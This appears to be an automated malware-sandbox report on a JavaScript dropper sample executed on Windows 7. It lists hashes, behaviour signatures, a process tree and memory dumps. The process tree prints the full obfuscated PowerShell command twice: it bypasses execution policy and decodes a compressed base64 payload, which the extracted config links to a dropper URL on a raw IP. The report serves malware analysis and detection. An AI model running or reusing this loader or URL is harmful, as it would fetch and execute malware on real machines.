Analysis

  • max time kernel
    42s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    04-01-2023 13:13

General

  • Target

    55e020dbea48939cdd285ea106713f40bc077e2c.js

  • Size

    43KB

  • MD5

    cd8ce0411e414f67fa7e34b06004314f

  • SHA1

    55e020dbea48939cdd285ea106713f40bc077e2c

  • SHA256

    0442f029601c5925d346260e512770beb5a9a28ef4ac9e2da5d1b0e7d27341a6

  • SHA512

    322b0c0a1166f392150d46f529ab3475954b5255f955e893bffc49c61865a2f953dc3dd598ca13f9954b61fa79bea797ec7e740ab7cab48d6d5dda08d9631e03

  • SSDEEP

    768:4aPlutIv0NmQCjO2rpReJk3zBE5kxuALjWV+yLFz9ohcqJ8H:uK1j1syDaVh9onKH

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://159.203.143.66/r/

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\55e020dbea48939cdd285ea106713f40bc077e2c.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1392
    • C:\wiNDOWS\SYsTEM32\cmD.exe
      "C:\wiNDOWS\SYsTEM32\cmD.exe" /c PoweRSheLL -execUTiONPoLic BypasS "& ((gV '*mDr*').naME[3,11,2]-Join'') ( nEw-oBJecT syStEm.iO.CompREsSiON.defLAtEStReAM( [SYstEM.io.MEmOryStream] [CoNVErT]::FrOmbASe64sTRING('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') , [sYsTEm.io.ComPREsSiOn.coMPreSsioNmODe]::DEcOmPreSs) |fOrEACH-obJEcT{ nEw-oBJecT sySTEM.Io.sTReaMreadeR( $_, [teXt.EnCODInG]::AsCiI)} ).ReaDtoenD( ) "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1492
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PoweRSheLL -execUTiONPoLic BypasS "& ((gV '*mDr*').naME[3,11,2]-Join'') ( nEw-oBJecT syStEm.iO.CompREsSiON.defLAtEStReAM( [SYstEM.io.MEmOryStream] [CoNVErT]::FrOmbASe64sTRING('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') , [sYsTEm.io.ComPREsSiOn.coMPreSsioNmODe]::DEcOmPreSs) |fOrEACH-obJEcT{ nEw-oBJecT sySTEM.Io.sTReaMreadeR( $_, [teXt.EnCODInG]::AsCiI)} ).ReaDtoenD( ) "
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1348
        • C:\Windows\system32\whoami.exe
          "C:\Windows\system32\whoami.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:664

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/664-61-0x0000000000000000-mapping.dmp

  • memory/1348-56-0x0000000000000000-mapping.dmp

  • memory/1348-58-0x000007FEF40A0000-0x000007FEF4AC3000-memory.dmp

    Filesize

    10.1MB

  • memory/1348-60-0x0000000001EE0000-0x0000000001F60000-memory.dmp

    Filesize

    512KB

  • memory/1348-59-0x000007FEF3540000-0x000007FEF409D000-memory.dmp

    Filesize

    11.4MB

  • memory/1392-54-0x000007FEFBA81000-0x000007FEFBA83000-memory.dmp

    Filesize

    8KB

  • memory/1492-55-0x0000000000000000-mapping.dmp